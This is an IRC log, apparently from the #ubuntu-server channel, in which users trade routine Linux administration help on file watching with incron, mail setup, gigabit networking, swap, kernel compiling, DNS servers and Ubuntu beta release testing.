<SpamapS> ffunenga: check out fail2ban and mod_security
<patdk-lap> those also combined with a few tricks and a catchapa
<patdk-lap> I really like reverse catchpa's (should figure out how to spell that again, it always confuses me, just like they do to me)
<sarnold> .. where they force _you_ to scribble a word illegibly? :)
<patdk-lap> no
<patdk-lap> where you add extra form boxs that should NOT be filled in
<sarnold> ah! hehe
<ffunenga> SpamapS: Thanks, mod_security seems to be promising
<ffunenga> patdk-lap: didn't think about captchas, nice one. What "few tricks" are you talking about?
<LeChacal2> hello all, question. I want to make a script watch for a file to appear and then execute some commends when the file appears. What is the best route for this? A crontab every minute was my first idea but wondering if there is something better.
<sarnold> LeChacal2: apt-cache show incron
<sarnold> it'll use the inotify mechanism to only poke your program when a watched file / directory is actually modified -- saving gobs of drive, CPU, heat and power
<patdk-lap> that doesn't sound very safe
<patdk-lap> can't use sudo?
<sarnold> patdk-lap?
<patdk-lap> running whatever happens to be in the file
<sarnold> "execute some commands when the file appears" ... not "execute the commands in the file" :)
<patdk-lap> ah, ok
<sarnold> good paranoia though. I like that.
<LeChacal2> looking at incron seems like I still have to have a script running all the time waiting for incron feedback
<LeChacal2> yes the file would be empty and the script would read the title of the file to know what to do
<sarnold> LeChacal2: it'd be something like /path/to/directory/ IN_CLOSE_WRITE,IN_MOVED_TO,IN_MODIFIED /path/to/script $#
<LeChacal2> sarnold, hmm I didn't look close enough at incron I guess, thank you, I will read more on it
<sarnold> LeChacal2: the incron program would be running all the time, yes, but it would be _asleep_ until the kernel alerts it to a new or modified file. Then it would execute your script. If you get 10 new files per minute, this might take more disk and cpu, but significantly faster response time. if you go ten minutes between files, this will take one tenth the disk and cpu, and be _significantly_ better response time.
<LeChacal2> sarnold: this would just be a "backdoor" remote access system for excuting commends on a server so it would be like once in a bluemoon so not worried about the cpu/disk usage
<sarnold> LeChacal2: then absolutely incron :)
<sarnold> .. and be careful of patdk-lap's warning! executing things found in random files can be bad for your health
<LeChacal2> yes i got that, the script would something like, look for file named shutdown in folder than shutdown the server not look in this folder and run the commends in the file
<pentagon> Anyone use mutt?
<sarnold> pentagon: yes
<pentagon> sarnold: I have postfix going now how do I configure mutt to grab i's mail.
<sarnold> pentagon: is postfix doing local delivery? does it go to /var/spool/mail/pentagon?
<sarnold> for your .muttrc, you'll set spoolfile=/path/to/spool/file and then set folder=/path/to/other/folders -- if you're using procmail to split mail into folders before delivery
<pentagon> sarnold: I am just trying to keep it simple. Is it ok to change sudo postconf -e 'home_mailbox = Maildir/' to sudo postconf -e 'home_mailbox = Mail/'
<sarnold> pentagon: probably; I don't know postfix as well as I should, though.
<sarnold> and you'll want to ignore my advice about spoolfile if you're using maildir :) I forget how that works too, but I seem to remember it was easier than I xpected.
<pentagon> sarnold: How do I initialise spoofiles or maildirs? Doesn't seem to say anything on the help page.
<sarnold> pentagon: spool file, just touch the file and check the permissions
<sarnold> Maildir, eh.... get procmail or postfix or mutt to do it? :)
<pentagon> I am looking for a .muttrc in the home but do not find it. sarnold
<pentagon> Where would the docs be stored?
<sarnold> pentagon: it won't be there by default; you'll need to create one to suit your needs
<sarnold> pentagon: man muttrc
<devslash> Im interested in setting up a headless dedicated ubuntu server. As far as specs go, Im looking at 3.0 GHZ or higher, at least 4 GB of RAM and ideally 4TB of storage. I've been looking at my options with different computers. does anyone have a recommendation as to what kind of system will work well for my needs
<AaronMickDee> UH
<AaronMickDee> What do you mean what kind of system? Ubuntu Server is probably one of the more documented OS's
<AaronMickDee> and probably the most supported.
<AaronMickDee> Oh, you mean what hardware?
<devslash> yes
<AaronMickDee> Depends what you plan on doing with the server. You said 4tb so I'm going to assume a media server?
<AaronMickDee> Or rather, file server?
<devslash> yea
<AaronMickDee> Ah. OK :) Well...
<AaronMickDee> 3.0Ghz could be overkill.
<devslash> ok thats not set in stone
<AaronMickDee> If you aren't transcoding, then most of the IO would be Hard Drive related, and not CPU.
<devslash> yea
<AaronMickDee> My media server (Ubuntu Server, 2.4ghz, 4gb ram, 1 raid5, and 2 raid0's) runs top notch for a media server connected to a few XBMC clients. runs very little CPU.
<AaronMickDee> I run transmission on it, but mostly used as a NAS. Very little CPU usage is going on.
<AaronMickDee> It's all mostly hard drive usage that's happening, so as long as you get some decent disks, you should be fine on a barebones system.
<AaronMickDee> 1gz or more, 2gb of ram or more and you should be perfectly fine.
<devslash> anything i need to keep in mind as far as hardware goes
<darksidesimmons> hey guys hows it going tonight? any apache guru's have some mod rewrite questions with magenta
<AaronMickDee> devslash: not really. make sure to get a gigabit ethernet card, and a gigabit ethernet router, and if you are using a switch, make sure its gigabit. home media centers will stall out and buffer a bit on 10/100 megabit connections.
<devslash> how do i know if my router is gigabit
<AaronMickDee> are you connected directly via a wire on your home computer?
<AaronMickDee> as in, the computer your on right now. is it wired or wireless to the router?
<devslash> i currently have an older laptop as my server
<devslash> which is connected via an ethernet cable
<devslash> I'm not on that computer now
<AaronMickDee> the computer you are on RIGHT now. is it wired or wireless?
<devslash> wireless
<AaronMickDee> windows or linux?
<devslash> linux (Ubuntu)
<AaronMickDee> connect wired
<AaronMickDee> if you can,
<devslash> yea
<devslash> like i said my existing server is connected via ethernet
<AaronMickDee> ok
<AaronMickDee> log into it via SSH
<AaronMickDee> and run this command: ethtool eth0 | grep -i speed
<sarnold> devslash: if you install 'ethtool' you'll be able to use it to determine if your NIC has negotiated gigabit or not with your switch
<AaronMickDee> if its 10 or 100, no good. if its 1000 your good.
<AaronMickDee> shouldn't ubuntu have ethtool installed default? i don't ever remember running it on my server but i do have it.
<devslash> also, i am going to be switching ISPs soon and will be using my apple router (yea  Iknow they aren't the best) as my router with my cable modem
<devslash> 100MB/s
<devslash> but
<devslash> thats with my current DSL modem. my router might be gigabit.
<AaronMickDee> it wouldn't matter. it would only show the link speed between server->router
<AaronMickDee> not server->modem. its the link speed.
<devslash> yes
<AaronMickDee> i'd suggest buying a gigabit switch or upgrading to gigabit router.
<devslash> currently I'm using my dsl modems' router capability for wifi
<AaronMickDee> ah ok.
<devslash> but I'm switching to cable
<AaronMickDee> anything on your network will only run at 100mb, even if its capable of gigabit. you'll get a max speed of about 12 megabytes per second. as with gigabit you'll hit 125 megabytes per second.
<devslash> the iso I'm signing up with is giving me a modem that doesn't have wifi capabilities so i am going to switch to my airport extreme router
<devslash> err isp
<AaronMickDee> You could, if your feeling dangerous, is get a switch with jumbo frames support (or if your router supports jumbo frames), and turn them on with every device within your network. your speeds could theoretically increase quite a bit with large file transfers (aka movies).
<devslash> i think thats beyond what i know how to do
<AaronMickDee> devslash: k. well, make sure to get gigabit speeds for a media server.
<AaronMickDee> otherwise you'll run into a lot of bottlenecking.
<devslash> so if i connect to a gigabit router thats connected via ethernet to a plain old cable modem, would there be any kind of bottleneck between the modem and router ?
<sarnold> you wouldn't care; the modem <-> ISP link is going to be way slower than even 100
<devslash> maybe this is a dumb question but does gigabit require different ethernet cable
<sarnold> a bit
<sarnold> cat 5e is minimum required for gigE, but most people deployed that for 100 anyhow
<pentagon> devslash: it is because of the twists in the wire similar to pots same reason DSL gets a lot of line noise
<devslash> oh i see
<pentagon> cat5e just has more twists so more copper more expensive
<devslash> brb
<pentagon> sarnold: im getting RCPT rejected when trying to receive mail from the outside I take it this is because my hostname is set different locally than my isp assigns me, any suggestions?
<sarnold> pentagon: eh? I thought RCPT was used when you were _sending_ mail ...
<sarnold> it's been years since I've done SMTP by hand, but I thuoght it was MAIL TO:  followed by RCPT FROM....
<sarnold> i'm too tired to be giving smtp advice. :) sorry pentagon.
<pentagon> I assume it's short for recipient, when it is showing in the mail.log as rejected.
<sarnold> can you copy-paste the whole line? that'll mean more to someone...
<sarnold> (like I said, tired, maybe not me.)
<devslash_> AaronMickDee: hey
<devslash_> i plugged in my airport extreme and went into a utility app that tells you about the hardware. i noticed that for ethernet (I connected my laptop to my AE via ethernet cable) it shows Media Subtype:1000baseT. that means its gigabit right ?
<devslash_> is anyone that i was talking to a few minutes ago still here ?
<pentagon> devslash_: I am.
<devslash_> that is gigabit right ?
<sarnold> devslash_: yay :)
<devslash_> good
<devslash_> i wonder if its causing any bottlenecks with my existing server at 100MB/s
<lifeless> devslash_: so 100MB/s is 800Mbps, or flatlined gigabit ethernet.
<devslash_> ok...
<devslash_> vs gigabit that is 8000Mbps ?
<sarnold> 1000Mbps --> ~120 MBps
<devslash_> huh
<sarnold> it's a bit confusing :)
<sarnold> 100 is megabit per second; 1000 is megabyte per second
<sarnold> err
<sarnold> stupid
<devslash_> when i do ethtool eth0 | grep -i speed it return "100Mb/s"
<sarnold> like I said, sleepy :)
<pentagon> The average user has no use for gigabit.
<sarnold> that's 100 megabit
<devslash_> right
<devslash_> but for my purposes I'm running a streaming file server essentially
<sarnold> that'll get you roughly 12 megabytes per second traffic
<pentagon> Ever seen the movie matrix ?
<devslash_> yea
<pentagon> Well the more bandwidth the more resolution the matrix gets, so how will you know reality ?
<devslash_> I'm streaming music files so nothing especially big. i know that my slow internet speeds are 1 factor which I'm fixing by upgrading yo a faster internet plan
<sarnold> devslash_: and you'll probably love cable over your dsl. all dsl users I know aren't real happy. my cable _flies_. (Not like South Korea or Sweden fast, but good for the US fast.)
<devslash_> you know how fast my fucking dshell is ? 3MB/s
<devslash_> the new one is a bit faster at 10
<devslash_> sarnold: how fast is your plan ?
<pentagon> See the bottleneck?
<pentagon> Gigabit router to run a 3MB/s connection.
<devslash_> so do you think my slow isp speeds are the biggest bottleneck ?
<devslash_> or the 100Mbps or both
<sarnold> devslash_: I routinely get 2MB/s downloads from ubuntu, torrents sometimes slightly more.
<devslash_> ok
<devslash_> but
<lifeless> sarnold: 1000Mbps -> 125MBps :P - caps matters > but you won't /get/ 125MBps most of the time, you generally max out 80% or so of the links nominal capacity
<sarnold> lifeless: in fact, I've never gotten more than 80MBps on this, I assume it's the cheap-ass switches we bought. :)
<sarnold> though it might also be the cheap-ass 5e we used.
<devslash_> since I'm running a file server serving music files (mp3s so most files are nominally small) do you think my isp or 100Mbps is causing a bottleneck
<sarnold> devslash_: depends what you're doing :) downloaded torrents off the internet, definitely the ISP.
<devslash_> no
<devslash_> most of what i use it for is streaming media files , music
<sarnold> devslash_: streaming four movies from your NAS to your xboxes, playstations, iphones, and laptops, that's all local.
<devslash_> i stream over the internet
<sarnold> ISP
<devslash_> thats what i thought. that should be fixed soon
<devslash_> once i get 10Mbps that not be an issue
<devslash_> that won't be a issue
<pentagon> Welcome to the matrix, enjoy your STAY.
<devslash_> whoa......
<pentagon> Tomorrow verizon wireless cmos eyes will be swarming you like sentinels.
<pentagon> I had to beg my isp to give me a lower bandwidth.
<pentagon> Eh, its working but not as well as I would liek.
<pentagon> Seems I have to put in my hostname manually for destinations since I have a generic locqal hostname.
<pentagon> CrypticSquared: nice nick
<CrypticSquared> um... thanks?
<three18ti> wtf does `grep -q` do? the man page says "do not write to STDOUt, exit immediately with zero status if the match is found" that would mean to me that if I don't find the string, return true.  I'm trying to decode this bash code in my rc.local of a new VM I've purchased.  http://paste.scsys.co.uk/208541
<three18ti> it looks like if "some conditional" it dumps the SMBIOS that contains the VNC password and resets it for toor:<passwd>
<three18ti> this conditional runs every time I reboot my VM since it's in /etc/rc.local...
<three18ti>  /etc/issues says I can delete the toor user, and I don't think chpasswd works on non existent users, so I -think- it sets the toor password back to whatever matches the specific handle in the SMBIOS
<pentagon> We can remember it for you wholesale.
<pentagon> I figured out who the we is.
<pentagon> What is the difference just close you eyes and do whatever you want.
<pentagon> Can't tell the difference.
<soren> three18ti: "grep -q" returns true if it finds what it's looking for and false if not.
<soren> three18ti: Just like "grep" (without -q). It just doesn't output the matching lines.
<uvirtbot> New bug: #1057289 in nova (main) "Ubuntu cloud archive missing nova-novncproxy" [Undecided,New] https://launchpad.net/bugs/1057289
<uvirtbot> New bug: #1057290 in nova (main) "Ubuntu cloud archive missing swift-plugin-s3" [Undecided,New] https://launchpad.net/bugs/1057290
<uvirtbot> New bug: #1057303 in samba (main) "package samba-common 2:3.4.7~dfsg-1ubuntu3.10 failed to install/upgrade: le sous-processus script post-installation installÃ© a retournÃ© une erreur de sortie d'Ã©tat 10" [Undecided,New] https://launchpad.net/bugs/1057303
<uvirtbot> New bug: #1057347 in apache2 (main) "a2ensite suggest files which do not exist" [Undecided,New] https://launchpad.net/bugs/1057347
<three18ti> soren, cool thanks.
<_ruben> what would be a nice place for a script to set irq affinities for nics? init script hooked to the net-device-up signal or so?
<RoyK> _ruben: in /etc/networks/interfaces, 'up /run/this/script', perhaps?
<_ruben> guess that would do as well yeah
<_ruben> the pinning of nic queues to specific cores did fix the uneven distribution btw :)
<RoyK> nice
<RoyK> how did you do that?
<patdk-lap> I thought that is why /usr/sbin/irqbalance was made
<_ruben> patdk-lap: irqbalance didn't manage to create an equal balance, cpu0 was getting the majority of the workload
<_ruben> or perhaps it'd even out better under higher loads, who knows
<_ruben> with irqbalance cpu0 would be 6+% si, and the others around 1% si
<patdk-lap> that is a good thing :)
<patdk-lap> unless the cpu is too loaded, it's better to load up one core
<patdk-lap> and keep the other cores lower
<patdk-lap> then you can use turbo boost or whatever they call it
<_ruben> RoyK: i used the printf snippets from http://www.metaflows.com/technology/10-gbps-pf_ring-2/ as an example basically
<_ruben> patdk-lap: well, the total (si) load dropped as well, even tho i was afraid the opposite would happen
<RoyK> _ruben: but patdk-lap's got a point. cpu cache is used far more efficiently if only one core is active
<RoyK> you may even save power by clocking down the others
<_ruben> i dont pay the power bill ;)
<RoyK> it's even good for the environment ;)
<patdk-lap> you will sleep better at night :)
<_ruben> once the load increases significantly on these boxes, i might revisit this stuff
<tcp_cungkr1nk> any nody here? :D
<tcp_cungkr1nk> any body here? :D
<_ruben> no
<RoyK> !ask
<ubottu> Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience
<alex88> hi guys, last night my server went down for an unknown reason, if it was a kernel panic, does it leave any trace? just to know if it was a kp or a power outage or similar
<tcp_cungkr1nk> hi,  my application with google maps API work fine on private IP, but the problem when accesed form public  IP. must have a configuration on ubuntu server?
<tcp_cungkr1nk> *from
<greppy> tcp_cungkr1nk: when I was messing with gmaps apis a few years ago, your api key was tied to the hostname and url, I don't know if they still do that.
<tcp_cungkr1nk> greppy i'm not set the hostname and url on my gmap api key
<_ruben> hmm .. seems irqbalance.org is down .. wondered if there was any details on if/how its behaviour depends on overal load
<_ruben> ah, ipv6+ssl appears to be broken for irqbalance.org
<daniel_-> anyone can tell me how I can set mysql to restart automatically on server restart? :)
<daniel_-> I have to restart mysqld manually on my vps everytime my provider updates their root server
<daniel_-> 'service mysql start' to /etc/rc.local ?
<jdrab> daniel_-: afaik mysql starts automaticaly
<jdrab> if not: sudo update-rc.d mysql defaults
<daniel_-> jdrab: thx
<daniel_-> my ubuntu server hangs on apt-get update -> "Unpacking replacement dpkg" is taking forever. any suggestions?
<smoser> jibel, qatracker fix:
<smoser> http://paste.ubuntu.com/1230366/
<smoser> just a logic error if --append is not given.
<briggz> theres a config file for port allowance right?
<briggz> what would everyone recommend for DNS Server?
 * andygraybeal awaits a response too :)
<briggz> what was your question andygraybeal?
<andygraybeal> briggz, i'm awaiting a r3esponse to your question also ;)
<andygraybeal> about the dns :)
<briggz> lol
<andygraybeal> have you looked at bind?
<briggz> I'm setting up a server for a intro to linux class
<briggz> not really, ive heard of it, but also heard it's complicated to setup
<andygraybeal> yea, i need a lifevest.
<briggz> I was going to go with that originally but I thought other people might have other ideas of fairly decent secure alturnatives.
<briggz> is that what your currently playing around with?
<andygraybeal> well.... i cheat and i use dns interface from openhosting and rackspace ... plus i've been messing with zentyal
<kontinuity> hi all
<andygraybeal> briggz, --*
<andygraybeal> errr... --^
<kontinuity> is it possible to recompile the 12.04 kernel in ec2?
<kontinuity> there is no ec2 branch on the precise kernel as there is on lucid
<Daviey> smoser: hey, can you make sure https://wiki.ubuntu.com/QuantalQuetzal/TechnicalOverview/Beta2 is good please?
<smoser> k. reading.
<Daviey> add anything awesome. :)
<Daviey> ta
<Daviey> smoser: Do you have the script for updating the iso tracker from jenkins testing?
<smoser> i use this http://bazaar.launchpad.net/~jibel/+junk/qatracker/
<smoser> from lp:~smoser/+junk/jenkins2isotracker/
<Daviey> thanks
<smoser> (ec2 is alrady done now. and utlemming has set it up to be more automatic on that too)
<smoser> note, there is a bug in qatracker
<smoser> basically you have to pass --append
<smoser> jibel, ^
<smoser> fix bug with
<smoser> http://paste.ubuntu.com/1230366/
<kontinuity> hi how can I recompile precise kernel on ec2?
<Daviey> smoser: if you have it already setup, can you run it for the iso tests?
<Daviey> smoser: i'll discuss with jamespage about trying to automate this
<smoser> where are results, daviey?
<Daviey> smoser: https://jenkins.qa.ubuntu.com/view/Quantal/view/ISO%20Testing%20Dashboard/ ?
<smoser> hm.. ok
<smoser> Daviey, i can't automate this at all, but i'll see if can't one time populate
<Daviey> smoser: Why can't it be automated ?
<smoser> i'm not doing it now
<Daviey> oh sure, i get that!
<Daviey> :)
<Daviey> I mean, going forwards.. i wondered if jenkins could JFDI?
<uvirtbot> New bug: #1057573 in socat (universe) "Socat depends on libreadline5 and fails to link properly." [Undecided,New] https://launchpad.net/bugs/1057573
<jibel> smoser, I pushed the script to lp:~ubuntu-qa-website-devel/ubuntu-qa-website/qatracker-tools
<zul> why the hell are we still subscribed to socat?
<jibel> smoser, feel free to submit LPs
<jibel> MPs
<zul> adam_g: ping awake yet?
<smoser> jibel, you can't submit MP on junk branch
<xnox> Daviey: maybe you'd like to talk with website people about server/cloud pages for 12.10 and whether you want to push lts/cloud-archive/quantal and in which combinations.
<xnox> Daviey: also I gave them heads up that there probably will be just "ubuntu server" (64 bit) and not "32 bit / 64 bit" variants.
<metap0d> Hi everyone, I just set up Ubuntu server and installed vsftpd on the system. I am trying to create user accounts on the system with no access to the shell but it seems when I attempt this  they lose the ability to connect to FTP as well. Here is the command I researched/built: useradd -d /home/user1 -s /sbin/nologin -G ftp user1
<ogra_> xnox, unless you want to point to arm server too from there :)
<metap0d> Any ideas?
<xnox> ogra_: hmm... http://www.ubuntu.com/download/desktop doesn't have any links to ARM, but the server one does... and it goes to "arm for desktop & server"
<xnox> =/
<ogra_> yeah, desktop is only a reference image while server is an actual product for arm
<jibel> smoser, you can propose a merge against ~ubuntu-qa-website-devel/ubuntu-qa-website/qatracker-tools isn't it ? it is not a junk branch
<smoser> http://bazaar.launchpad.net/~jibel/+junk/qatracker/
<smoser> i was just using that
<smoser> i didn't know there was another.
<jibel> smoser, ah,ok, it's obsolete now, I moved everything to a more 'official' branch
<jibel> [17:11] <jibel> smoser, I pushed the script to lp:~ubuntu-qa-website-devel/ubuntu-qa-website/qatracker-tools
<jibel> modulo utc+2
<Daviey> xnox: urgently?
<xnox> Daviey: between now and release day.
<xnox> Daviey: I think beta2 is more urgent right now =)
<roaksoax> Daviey: could you look at the upload of maas-enlist i just made pleasE?
<Daviey> roaksoax: for b2?
<xnox> Daviey: skaet is waiting on you for b2.
<Daviey> xnox: yeah
<skaet> Daviey,  yeah,  we're missing manditory server testing results and its critical path for releaseing the images
<Daviey> ugh
<Daviey> smoser: Did you post everything which jenkins covered?
<roaksoax> Daviey: no not necessary for b2
<roaksoax> :)
<Daviey> thank goodness :)
<smoser> Daviey, no. i'm working on it.
<smoser> its aPITA
<Daviey> smoser: ugh
<Daviey> sorry, i thought it would be easy
<smoser> i was trying to at least model
<smoser> what data we'd need and such
<Daviey> skaet: we do have 100% mandatory
<smoser> Daviey, http://pb.daviey.com/jGFS/
<smoser> thats the maaping i have so far
<kontinuity> any idea where I can get the ec2 12.04 kernel source?
<smoser> kontinuity, its just the -virtual kernel (which is just the -server kernel)
<smoser> so your question is generalized to
<smoser> "where can i get ubuntu kernel source"
<skaet> Daviey,  amd64+mac is missing 3 manditory results.
<kontinuity> smoser: thanks! I am trying to compile the ec2 kernel, any pointers? I am following this guide for now http://wiki.freeswitch.org/wiki/Amazon_EC2#Updating_Kernel_Timer_to_1000HZ
<skaet> http://iso.qa.ubuntu.com/qatracker/milestones/238/builds/24189/testcases
<smoser> well, 'git checkout --traac -b ec2' is no longer valid
<smoser> https://help.ubuntu.com/community/Kernel/Compile
<kontinuity> but as you mentioned the ec2 branch is no longer valid for Precise
<kontinuity> so can I build from the main branch
<kontinuity> ?
<AlexO> Hey! I just remove my swap partition to resize another, then I recreated another patition for the swap but what do i have to do to tell my server where is my new swap partition?
<RoyK> AlexO: mkswap on the partition and add it to /etc/fstab
<RoyK> and remove the old one
<kontinuity> smoser: any clues?
<smoser> kontinuity, yes. its just the '-server' kernel. so follow any instructions you see for that.
<kontinuity> smoser: awesome thanks
<AlexO> RoyK: Thanks ! Do I need to reboot?
<RoyK> AlexO: no, just swapon -a
<AlexO> RoyK: Thanks again working just fine :)
<TheLordOfTime> how can i force apt-get to resolve the dependencies and install the deps for a given package?
<TheLordOfTime> its been being stupid for a while now, so...
<RoyK> AlexO: I'd recommend using the swap partition's UUID in /etc/fstab - use blkid to find it
<AlexO> RoyK: When I did mkswao /dev/sda5 It return me the UUID
<RoyK> AlexO: also, run swapon -s to make sure the old partition isn't hanging around, if it is, you may have to rebot
<RoyK> AlexO: ah, ok
<RoyK> AlexO: or at least, swapoff that one
<AlexO> RoyK: Ok Thanks :)
<RoyK> AlexO: did you swapoff the old one before you repartitioned?
<AlexO> RoyK: Nope I used gparted(iso) to remove it and when I do a swapon -s I only have one swap partition listed
<RoyK> ok
<RoyK> if you removed the partition while running swap on it, it might have been a slight problem...
<AlexO> Yeah I guess ^
<RoyK> http://dalkescientific.com/writings/diary/archive/2007/06/01/lolpython.html
<hallyn> zul: ping on sponsoring bug 1054306 ?  (debdiff for augeas bugfix)
<uvirtbot> Launchpad bug 1054306 in netcf "ncftool list fails" [High,Invalid] https://launchpad.net/bugs/1054306
<skaet> Daviey,  is someone working on those last manditory test cases for amd64+mac or do you consider it good enough as is to ship?
<Daviey> skaet: amd64+mac not a released item
<Daviey> :)
<skaet> Daviey,  can you either add it to the community set,  or remove it from the daily builds then.    Prefer to save testing focus for those that are then.
<skaet> ok, marking it as ready.
<skaet> Daviey,  https://wiki.ubuntu.com/QuantalQuetzal/TechnicalOverview/Beta2  <-- have you finished making your edits?
<zul> hallyn: sure i can get it in a little bit
<hallyn> zul: thanks
<hallyn> stgraber: would there be any chance of getting augeas added to the server package list?
<zul> hallyn:  need to upload openstack final first though
<hallyn> zul: np, i'ts not that urgent, long as it makes release :)
<stgraber> hallyn: I think the problem is that for some reason libvirt isn't in the ubuntu-server packageset, if it was, augeas would be pulled in automatically
<hallyn> stgraber: d'oh
<rjune> I have "d-i tasksel/first multiselect edubuntu-desktop" in my preseed file, can someone give me some pointers as to why it isn't installing edubuntu-desktop?
<highvoltage> rjune: hmm, that's how I have it in my preseed notes, perhaps something changed in d-i recently
<highvoltage> rjune: which ubuntu version is that?
<rjune> I'm trying to install precise
<highvoltage> hmm, that's how it's done in https://help.ubuntu.com/12.04/installation-guide/example-preseed.txt too
<rjune> *sigh*
<highvoltage> stgraber: happen to have any insights on why that could happen? ^^^
<rjune> highvoltage, are you doing network installs?
<stgraber> highvoltage: do you have universe and multiverse enabled?
<briggz> can you guys see what I type?
<stgraber> highvoltage: oh, and the task is edubuntu-desktop-gnome btw :)
<sarnold> briggz: pong
<stgraber> http://www.stgraber.org/download/preseeds/weblive-edubuntu.seed is a working seed to install edubuntu (you probably want to change the password and drop the late_command though)
<briggz> I joined another channel, it tells me it can't send to channel when I try to type a question
<rjune> stgraber, thanks, what does the late command do?
<RoyK> briggz: probably because you're not logged into nickserv
<stgraber> rjune: download and call a script at the end of the install
<RoyK> briggz: but frankly, that's not an ubuntu question ;)
<briggz> RoyK: I realize that, however, I'm able to repsond here aren't I?
<sarnold> briggz: you're not identified to nickserv; perhaps you need to register your nick and identify. (Some channels require that to try to cut down on spammers.) Or, perhaps the channel is moderated (+m) in which case only ops and voiced users can type
<rjune> stgraber, do you have the sample script to be used for that too?
<RoyK> briggz: I don't think #ubuntu-server requires users to be logged in, some channels do
<stgraber> rjune: not really
<sarnold> briggz: /j #freenode -- hopefully someone there will be more familiar with the various rules :)
<briggz> RoyK: actually it does, but that's ok
<briggz> so heres is a ubuntu question
<RoyK> briggz: someone might have added more restrictions to that channel, then
<RoyK> !ask | briggz
<ubottu> briggz: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience
<briggz> Where are html files defaultly stored for webserver Apache2?
<rjune> stgraber,  so trial and error for me?
<RoyK> /var/www
<briggz> RoyK: Thanks
<stgraber> rjune: well, as I said, if you just want to install Edubuntu, you don't need it, so just remove that line from the preseed
<RoyK> briggz: np, but it'd take you about 23 seconds of googling to find that if you're a slow googler
<rjune> stgraber, I have a script we run after install. if I can get it to run automatically, makes our lives easier
<jamespage> Daviey - bug 1057635 for the iscsiroot boot failure
<uvirtbot> Launchpad bug 1057635 in ubuntu "initramfs does not use iscsiroot device presented by ipxe" [Undecided,New] https://launchpad.net/bugs/1057635
<Daviey> ugh
<jamespage> Daviey, just testing i386 to see if i has the same issue now
<jamespage> smoser, hey - around?
<smoser> here
<smoser> you're going to make fun of my html scraping aren't you
<Daviey> hah
<jamespage> smoser, nope - I have to go to the openstack meetup in london now - bug 1057635 needs adding to the beta-2 release notes
<uvirtbot> Launchpad bug 1057635 in ubuntu "initramfs does not use iscsiroot device presented by ipxe" [Undecided,New] https://launchpad.net/bugs/1057635
<jamespage> any chance you can do the honours?
<smoser> sure
<jamespage> my description may not be that accurate....
<jamespage> supposition
<smoser> huh.
<koolhead17> Daviey, i did it sir. :P
<rjune> stgraber, thanks, I needed edubuntu-desktop-gnome, not edubuntu-desktop
<pentagon> Does the server use avahi for dhcp or another package ?
<rbasak> pentagon: as a dhcp client? isc-dhcp-client
<rbasak> pentagon: there's avahi-autoipd but I don't think that's used on server
<adam_g> zul: ready
<zul> adam_g: cool thanks
<adam_g> zul: please check that that change is sane
<pentagon> rbasak: Do you think it would be very hard to rip out avahi on a desktop system and install isc-dhcp-client ?
<zul> adam_g: looks good to me
<rbasak> pentagon: I think you're in the wrong channel! Try #ubuntu.
<genii-around> Odd. removing popularity-contest in 10.04 wants to also remove ubuntu-standard
<sarnold> genii-around: note apt-cache show ubuntu-standard Depends: .. popularity-contest, ...
<genii-around> Seems unusual, i thought popularity-contest was an optional package
<simosx> maybe it was marked like that at that time. In any case, popcon is off by default.
<pentagon> Please help.
<genii-around> Well, this box is pretty old, went from 8.04-10.04  maybe the dependencies are messed up somehow
<pentagon> usr13_: I understand hostname but I want it to function by default the way the server edition does.
<pentagon> oops
<pentagon> I posted in the wrong channel trying to scroll up and get that post.
<pentagon> How can I convert a desktop system to act the way a server edition does conscerning dhcp networking and the setting of hostname. #Ubuntu is of no help because I don't think they know how the server edition functions.
<ikonia> pentagon: exactly the same way as a server
<ikonia> pentagon: install the needed packages to run the daemons you want and configure them
<MACscr> how would i find out what method was used to install mysql on an ubuntu system? The debian-sys-maint user is missing and im trying to figure out why
<MACscr> id also like to know what privs this user should have so i can recreate it
<allohak> pulseaudio auto detects bluetooth on 12.04 desktop, how do I get the same effect in 12.04 server?
<allohak> I have bluez, alsa, pulseaudio, and i *think* all the relevant packages installed that let them talk to each other
<briggz> has anyone setup a DNS locally on a LAN?
<uvirtbot> New bug: #1057772 in samba (main) "package samba 2:3.6.3-2ubuntu2.3 failed to install/upgrade: il sottoprocesso nuovo script post-removal ha restituito lo stato di errore 127" [Undecided,New] https://launchpad.net/bugs/1057772
<MACscr> Hmm, i was told that running dpkg-reconfigure mysql-server-5.1 should give me an option to recreate the debian-sys-maint user, but it just ended up resetting the root pass
<MACscr> did i miss something?
<sarnold> briggz: check out powerdns; it is way easier to set up than bind.
<sarnold> briggz: pdns-recursor can even serve up an /etc/passwd file if you want _simple_ :)
<briggz> sarnold: Thanks, that's the kind of information I was looking for, I heard bind was very complex.
<allohak> briggz: try dnsmasq
<allohak> briggz: I run a small business network and use it for internal name resolution
<briggz> Will either of those options be afftected if I buy a domain name in the future?
<allohak> briggz: another option is bind9, though it is a little more complicated
<sarnold> briggz: no, you probably don't want to serve your world-wide DNS using internal machines anyhow
<sarnold> briggz: your ISPs will probably be able to help you there
<briggz> what I'm going to do it but the domain, then point to my ip
<briggz> I don't need to setup internally really, just thought it might be neat to try, I'm going to more focus on a normal DNS setup
<drag0nius> i'm running ubuntu server as a router, how would i set up DMZ with my gaming computer?
<drag0nius> basically i know which ports all services running on ubuntu server use, but i don't want to set up new rules every time i play new game
<drag0nius> so i'd just forward everything that is not used on server to gaming comp
<sarnold> drag0nius: netstat -anp is a good starting point
<drag0nius> setting up DMZ on gaming comp would be most convenient
<drag0nius> so i would never have to care whether it's port forwarding problem or something else with setting up game server
<drag0nius> what soft should i check for it?
<sarnold> drag0nius: perhaps the 'ufw' friendly-firewall tool can help you write the correct iptables rules
<sarnold> drag0nius: but as far as I know there is no single box to check to get done what you wish
<jdstrand> ufw could help, but it isn't as friendly as one could imagine for a router. though, 'man ufw-framework' has workable example of how to use the ufw framework on a router
<drag0nius> DMZ is kinda first thing i cant find how to configure
<drag0nius> tried sneaking on Tomato, but looks like DMZ isnt set up with iptables
<sarnold> ah, <3 tomato.
<drag0nius> wish there would be some tomato-like overlay for ubuntu server XD
<sarnold> drag0nius: well, 'apt-cache search firewall' will show tools that may be able to help you some. 'shorewall' comes to mind as another potential helper, but I haven't used any of these things.
<briggz> ubuntu server has built in firewall right?
<sarnold> briggz: yes. but writing rules is up to you. either you write them by hand, or you use the 'ufw' or another front-end to write rules.
<drag0nius> hmm i think dmz might not be exactly what im looking for
